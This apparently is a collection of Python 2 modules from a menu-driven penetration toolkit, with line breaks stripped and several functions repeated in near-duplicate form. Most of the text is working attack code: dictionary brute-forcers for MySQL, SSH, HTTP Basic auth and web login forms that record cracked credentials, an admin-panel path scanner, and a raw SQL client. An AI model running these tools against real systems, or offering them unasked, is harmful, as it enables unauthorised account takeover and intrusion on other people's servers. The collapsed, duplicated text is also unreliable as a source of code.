def adminfinder(run): try: global defaulthost, defaultport, defaultdicc if run != 1: actions = raw_input(d.prompt("web/cpfinder")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("table", "no", "Dictionary", defaultdicc) d.space() elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set table": defaultdicc = ping.update(defaultport, actions, "table") d.change("table", defaultdicc) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading_file() with open(defaultdicc, 'r') as dirt: results = "" resultn = "" for patch in dirt: patch = patch.replace("\n", "") patch = "/" + patch connection = httplib.HTTPConnection( defaulthost, defaultport) connection.request("GET", patch) response = connection.getresponse() if response.status == 200 or response.status == 301: print " " + Suf + " Response " + patch results = "-" + Suf + " " + patch + "\n" + results resultn = patch + "," + resultn else: print " " + Alr + " Checking..." + colors[ 0] + patch if results != "": print "\n" + results ping.savefive("Admin Finder", defaulthost, defaultport, results) else: print "\n " + Nrs + " Not Results :(.\n" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) adminfinder(0)
def adminfinder(run): try: global defaulthost, defaultport, defaultdicc if run != 1: actions = raw_input(d.prompt("web/cpfinder")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("table", "no", "Ditionary", defaultdicc) d.space() elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set table": defaultdicc = ping.update(defaultport, actions, "table") d.change("table", defaultdicc) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading_file() with open(defaultdicc, "r") as dirt: results = "" resultn = "" for patch in dirt: patch = patch.replace("\n", "") patch = "/" + patch connection = httplib.HTTPConnection(defaulthost, defaultport) connection.request("GET", patch) response = connection.getresponse() if response.status == 200 or response.status == 301: print " " + Suf + " Response " + patch results = "-" + Suf + " " + patch + "\n" + results resultn = patch + "," + resultn else: print " " + Alr + " Checking..." + colors[0] + patch if results != "": print "\n" + results ping.savefive("Admin Finder", defaulthost, defaultport, results) else: print "\n " + Nrs + " Not Results :(.\n" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) adminfinder(0)
def btsql(run): try: global defaulthost, defaultport, defaultuser, defaultdicc if run != 1: actions = raw_input(d.prompt("bt/sql")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc) d.space() btsql(0) elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdicc = ping.update(defaultdicc, actions, "dict_1") d.change("dict_1", defaultdicc) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading_file() try: with open(defaultdicc, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") try: MySQLdb.connect( defaulthost, defaultuser, ps, '') if True: ping.save("BruteForceSQL", defaulthost, defaultport, defaultuser, ps) d.Success(defaultuser, ps) return 1 except: print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) btsql(0)
def btsql(run): try: global defaulthost,defaultport,defaultuser,defaultdicc if run!=1: actions=raw_input(d.prompt("bt/sql")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("user","yes","Username",defaultuser) d.descrip("dict_1","yes","Dictionary pass",defaultdicc) d.space() btsql(0) elif actions[0:10] == "set target": defaulthost=defaulthost.replace("http://", "") defaulthost=ping.update(defaulthost,actions,"target") d.change("target",defaulthost) elif actions[0:8] == "set port": defaultport=ping.update(defaultport,actions,"port") d.change("port",defaultport) elif actions[0:8] == "set user": defaultuser=ping.update(defaultuser,actions,"user") d.change("user",defaultuser) elif actions[0:10] == "set dict_1": defaultdicc=ping.update(defaultdicc,actions,"dict_1") d.change("dict_1",defaultdicc) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: d.loading_file() try: with open(defaultdicc,'r') as passs: for ps in passs: ps=ps.replace("\n","") try: MySQLdb.connect(defaulthost,defaultuser,ps,'') if True: ping.save("BruteForceSQL",defaulthost,defaultport,defaultuser,ps) d.Success(defaultuser,ps) return 1 except: print " "+Alr+" Checking ("+defaultuser+"="+ps+")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) btsql(0)
def httpformbasebruteforce(run): try: global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont if run != 1: actions = raw_input(d.prompt("web/formbt")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("patch", "yes", "Folder or dir", defaultpach) d.descrip("para_1", "yes", "Parameter 1", defaultdat1) d.descrip("user", "yes", "Username", defaultuser) d.descrip("para_2", "yes", "Parameter 2", defaultdat2) d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2) d.descrip("method", "yes", "POST or GET", defaultmeth) d.descrip("condit", "yes", "[if!=]No Logged", defaultcont) print "" elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set patch": defaultpach = ping.update(defaultpach, actions, "patch") d.change("patch", defaultpach) elif actions[0:10] == "set condit": defaultcont = ping.update(defaultcont, actions, "condit") d.change("condit", defaultcont) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdic2 = ping.update(defaultdic2, actions, "dict_1") d.change("dict_1", defaultdic2) elif actions[0:10] == "set para_1": defaultdat1 = ping.update(defaultdat1, actions, "para_1") d.change("para_1", defaultdat1) elif actions[0:10] == "set para_2": defaultdat2 = ping.update(defaultdat2, actions, "para_2") d.change("para_2", defaultdat2) elif actions[0:10] == "set method": defaultmeth = ping.update(defaultmeth, actions, "method") d.change("method", defaultmeth) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading_file() try: with open(defaultdic2, "r") as passs: for ps in passs: ps = ps.replace("\n", "") params = urllib.urlencode({defaultdat1: defaultuser, defaultdat2: ps}) header = { "Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", } conn = httplib.HTTPConnection(defaulthost, defaultport) conn.request(defaultmeth, defaultpach, params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(defaultcont) <= 0: ping.savefour( "BruteForceFormBase", defaulthost, defaultport, defaultpach, defaultmeth, defaultdat1, defaultdat2, defaultuser, ps, ) print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + ps + "]\n" httpformbasebruteforce(0) else: print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + ps + ")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdic2) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) httpformbasebruteforce(0)
def btssh(run): try: global defaulthost, defaultport, defaultuser, defaultdicc if run != 1: actions = raw_input(d.prompt("bt/ssh")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc) print "" btssh(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) btssh(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) btssh(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user", defaultuser) btssh(0) elif actions[0:10] == "set dict_1": defaultdicc = actions[11:] d.change("dict_1", defaultdicc) btssh(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading() try: with open(defaultdicc, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") try: connect = pxssh.pxssh() connect.login(defaulthost, defaultuser, ps) if True: ping.save("BruteForceSSH", defaulthost, defaultport, defaultuser, ps) print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n" return 1 except: print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")" except: d.filenot(defaultdicc) btpop3(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() btssh(0)
def httpbt(run): try: global defaulthost, defaultport, defaultpach, defaultdic1, defaultdic2 if run != 1: actions = raw_input(d.prompt("web/httpbt")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("patch", "yes", "Folder or dir", defaultpach) d.descrip("dict_1", "yes", "Dictionary user", defaultdic1) d.descrip("dict_2", "yes", "Dictionary pass", defaultdic2) print "" elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) httpbt(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) httpbt(0) elif actions[0:9] == "set patch": defaultpach = actions[10:] d.change("patch", defaultpach) httpbt(0) elif actions[0:10] == "set dict_1": defaultdic1 = actions[11:] d.change("dict_1", defaultdic1) httpbt(0) elif actions[0:10] == "set dict_2": defaultdic2 = actions[11:] d.change("dict_1", defaultdic2) httpbt(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: red = socket.socket(socket.AF_INET, socket.SOCK_STREAM) red.connect((defaulthost, int(defaultport))) try: d.loading() try: with open(defaultdic1, 'r') as user: for us in user: try: with open(defaultdic2, 'r') as passs: for ps in passs: us = us.replace("\n", "") ps = ps.replace("\n", "") red.send("GET " + defaultpach + " HTTP/1.1\r\n") red.send("HOST: " + defaulthost + "\r\n") red.send( "Authorization:Basic " + base64.b64encode(us + ":" + ps) + "\r\n\r\n") last = red.recv(1000) if last.find("401") <= 0: log = open( 'core/logs/logsBruteForce.log', 'a') log.write( '\n ===================================== ' ) log.write( '\n Module : BruteForceHTTP' ) log.write( '\n Data : ' + time.strftime('%c')) log.write('\n target : ' + defaulthost) log.write('\n port : ' + defaultport) log.write('\n patch : ' + defaultpach) log.write( '\n Cracked : username : '******' , password : ' + ps) log.close() d.sucess(us, ps) red.close httpbt(0) else: print " [" + colors[4] + "!" + colors[ 0] + "] Checking (username="******")(password="******")" red.close except: d.filenot(defaultdic2) httpbt(0) except: d.filenot(defaultdic1) httpbt(0) except: d.kbi() except: d.off() else: d.nocommand() except: d.kbi() exit() httpbt(0)
def cmysql(run): global defaulthost, defaultport, defaultuser, defaultpass try: if run != 1: actions = raw_input(d.prompt("clt/sql")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("pass", "yes", "Password", defaultpass) d.space() cmysql(0) elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:8] == "set pass": defaultpass = ping.update(defaultpass, actions, "pass") d.change("pass", defaultpass) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "") if True: try: cmd = "nop" print "\n " + Hlp + " SQL Client help\n" print " -------------------------------------------------------------------------------------------------------" print " |" + colors[6] + "Commd" + colors[0] + " | " + colors[ 6 ] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[ 0 ] + " |" print " -------------------------------------------------------------------------------------------------------" print " |show databases | list databases | show databases |" print " |use | select database | use user_table |" print " |show tables | list tables | show tables |" print " |create database | create databases| create database USERS | " print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | " print " |drop database | drop databases | drop database USERS | " print " |drop table | drop tables | drop table EMAIL | " print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | " print " |update | update data | update EMAILS set name='Willy' where id=1 | " print " |select | select data | select id, name from EMAILS | " print " -------------------------------------------------------------------------------------------------------" print "" while cmd != "exit": cmd = raw_input(d.Client_prompt("sql")) cur = con.cursor() try: tor = cur.execute(cmd) if True: for x in range(tor): print cur.fetchone() except: print " " + Bad + " No command '" + cmd + "' found" except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) cmysql(0)
def cmysql(run): global defaulthost,defaultport,defaultuser,defaultpass try: if run!=1: actions=raw_input(d.prompt("clt/sql")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("user","yes","Username",defaultuser) d.descrip("pass","yes","Password",defaultpass) print "" cmysql(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) cmysql(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) cmysql(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user",defaultuser) cmysql(0) elif actions[0:8] == "set pass": defaultpass = actions[9:] d.change("pass",defaultpass) cmysql(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": help.help() elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": d.run() try: ping.live(defaulthost,defaultport) if True: try: con=MySQLdb.connect(defaulthost, defaultuser, defaultpass,"") if True: try: cmd="nop" print "\n "+Hlp+" SQL Client help\n" print " -------------------------------------------------------------------------------------------------------" print " |"+colors[6]+"Commd"+colors[0]+" | "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |" print " -------------------------------------------------------------------------------------------------------" print " |show databases | list databases | show databases |" print " |use | select database | use user_table |" print " |show tables | list tables | show tables |" print " |create database | create databases| create database USERS | " print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | " print " |drop database | drop databases | drop database USERS | " print " |drop table | drop tables | drop table EMAIL | " print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | " print " |update | update data | update EMAILS set name='Willy' where id=1 | " print " |select | select data | select id, name from EMAILS | " print " -------------------------------------------------------------------------------------------------------" print "" while(cmd!="exit"): cmd = raw_input(colors[1]+" CLT~"+colors[3]+"sql/> "+colors[0]) cur=con.cursor() try: tor=cur.execute(cmd) if True: for x in range(tor): print cur.fetchone() except: print " ["+colors[1]+"-"+colors[0]+"] Error: command" except(KeyboardInterrupt): d.kbi() except Exception,e: print(" ["+colors[1]+"-"+colors[0]+"] Timeout.", e) except: d.nomatch() except: d.off() else: d.nocommand() except: d.kbi() exit() cmysql(0)
def cmysql(run): global defaulthost, defaultport, defaultuser, defaultpass try: if run != 1: actions = raw_input(d.prompt("clt/sql")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("pass", "yes", "Password", defaultpass) print "" cmysql(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) cmysql(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) cmysql(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user", defaultuser) cmysql(0) elif actions[0:8] == "set pass": defaultpass = actions[9:] d.change("pass", defaultpass) cmysql(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "") if True: try: cmd = "nop" print "\n " + Hlp + " SQL Client help\n" print " -------------------------------------------------------------------------------------------------------" print " |" + colors[6] + "Commd" + colors[ 0] + " | " + colors[ 6] + "Description" + colors[ 0] + " | " + colors[ 6] + "Examples" + colors[ 0] + " |" print " -------------------------------------------------------------------------------------------------------" print " |show databases | list databases | show databases |" print " |use | select database | use user_table |" print " |show tables | list tables | show tables |" print " |create database | create databases| create database USERS | " print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | " print " |drop database | drop databases | drop database USERS | " print " |drop table | drop tables | drop table EMAIL | " print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | " print " |update | update data | update EMAILS set name='Willy' where id=1 | " print " |select | select data | select id, name from EMAILS | " print " -------------------------------------------------------------------------------------------------------" print "" while (cmd != "exit"): cmd = raw_input(colors[1] + " CLT~" + colors[3] + "sql/> " + colors[0]) cur = con.cursor() try: tor = cur.execute(cmd) if True: for x in range(tor): print cur.fetchone() except: print " [" + colors[1] + "-" + colors[ 0] + "] Error: command" except (KeyboardInterrupt): d.kbi() except Exception, e: print( " [" + colors[1] + "-" + colors[0] + "] Timeout.", e) except: d.nomatch() except: d.off() else: d.nocommand() except: d.kbi() exit() cmysql(0)
def httpformbasebruteforce(run): try: global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont if run != 1: actions = raw_input(d.prompt("web/formbt")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("patch", "yes", "Folder or dir", defaultpach) d.descrip("para_1", "yes", "Parameter 1", defaultdat1) d.descrip("user", "yes", "Username", defaultuser) d.descrip("para_2", "yes", "Parameter 2", defaultdat2) d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2) d.descrip("method", "yes", "POST or GET", defaultmeth) d.descrip("condit", "yes", "[if!=]No Logged", defaultcont) print "" elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:9] == "set patch": defaultpach = ping.update(defaultpach, actions, "patch") d.change("patch", defaultpach) elif actions[0:10] == "set condit": defaultcont = ping.update(defaultcont, actions, "condit") d.change("condit", defaultcont) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdic2 = ping.update(defaultdic2, actions, "dict_1") d.change("dict_1", defaultdic2) elif actions[0:10] == "set para_1": defaultdat1 = ping.update(defaultdat1, actions, "para_1") d.change("para_1", defaultdat1) elif actions[0:10] == "set para_2": defaultdat2 = ping.update(defaultdat2, actions, "para_2") d.change("para_2", defaultdat2) elif actions[0:10] == "set method": defaultmeth = ping.update(defaultmeth, actions, "method") d.change("method", defaultmeth) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": help.help() elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": d.run() try: ping.live(defaulthost, defaultport) if True: try: d.loading_file() try: with open(defaultdic2, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") params = urllib.urlencode({ defaultdat1: defaultuser, defaultdat2: ps }) header = { "Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain" } conn = httplib.HTTPConnection( defaulthost, defaultport) conn.request(defaultmeth, defaultpach, params, header) response = conn.getresponse() ver_source = response.read() if ver_source.find(defaultcont) <= 0: ping.savefour("BruteForceFormBase", defaulthost, defaultport, defaultpach, defaultmeth, defaultdat1, defaultdat2, defaultuser, ps) print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + ps + "]\n" httpformbasebruteforce(0) else: print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + ps + ")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdic2) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) httpformbasebruteforce(0)